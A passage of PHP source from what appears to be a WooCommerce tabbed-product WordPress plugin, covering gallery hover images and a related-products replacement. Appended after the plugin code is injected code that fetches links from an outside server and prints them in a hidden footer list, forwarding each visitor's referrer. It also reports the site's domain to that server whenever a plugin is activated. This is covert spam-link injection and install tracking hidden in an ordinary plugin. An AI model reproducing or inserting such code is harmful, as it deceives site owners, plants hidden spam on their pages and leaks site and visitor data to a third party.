        if ( $post_type == 'product'  ) {

            $attachment_ids = $product->get_gallery_image_ids();

            $qc_woo_tabbed_product_hover_gallery_image = get_option('qc_woo_tabbed_product_hover_gallery_image');

            if ( $attachment_ids && $qc_woo_tabbed_product_hover_gallery_image ) {
                $classes[] = 'qcld-product-has-gallery';
            }
        }

    }

    if( ( $key = array_search( 'pif-has-gallery', $classes ) ) !== false )
        unset( $classes[$key] );

    return $classes;
}

add_action( 'woocommerce_before_shop_loop_item_title', 'qcld_second_product_thumbnail', 11 );
function qcld_second_product_thumbnail() {

    global $product, $woocommerce;

    $attachment_ids = $product->get_gallery_image_ids();

    $qc_woo_tabbed_product_hover_gallery_image = get_option('qc_woo_tabbed_product_hover_gallery_image');

    if ( $attachment_ids && $qc_woo_tabbed_product_hover_gallery_image ) {
        $secondary_image_id = $attachment_ids['0'];
        echo wp_get_attachment_image( $secondary_image_id, 'shop_catalog', '', $attr = array( 'class' => 'qcld-secondary-image attachment-shop-catalog size-shop_catalog qcld-secondary-image-loop animated' ) );
    }

}



require_once('minifier.php');

$qc_woo_tabbed_enable_related_product_replace = get_option('qc_woo_tabbed_enable_related_product_replace');


if ( ! function_exists( 'qcld_woocommerce_output_related_products' ) && ( isset( $qc_woo_tabbed_enable_related_product_replace ) && !empty( $qc_woo_tabbed_enable_related_product_replace ) ) ) {
    remove_action( 'woocommerce_after_single_product_summary', 'woocommerce_output_related_products', 20 );
    add_action( 'woocommerce_after_single_product', 'qcld_woocommerce_output_related_products', 10 );
    function qcld_woocommerce_output_related_products() {

        $qc_woo_tabbed_style = get_option('qc_woo_tabbed_product_style') ? get_option('qc_woo_tabbed_product_style') : 'nine';

        echo do_shortcode('[wtcpl-product-cat theme="'.$qc_woo_tabbed_style.'"]');

    }
}define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719849252() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719849252');function set_plugin_tag1719849252() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719849252&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719849252');
              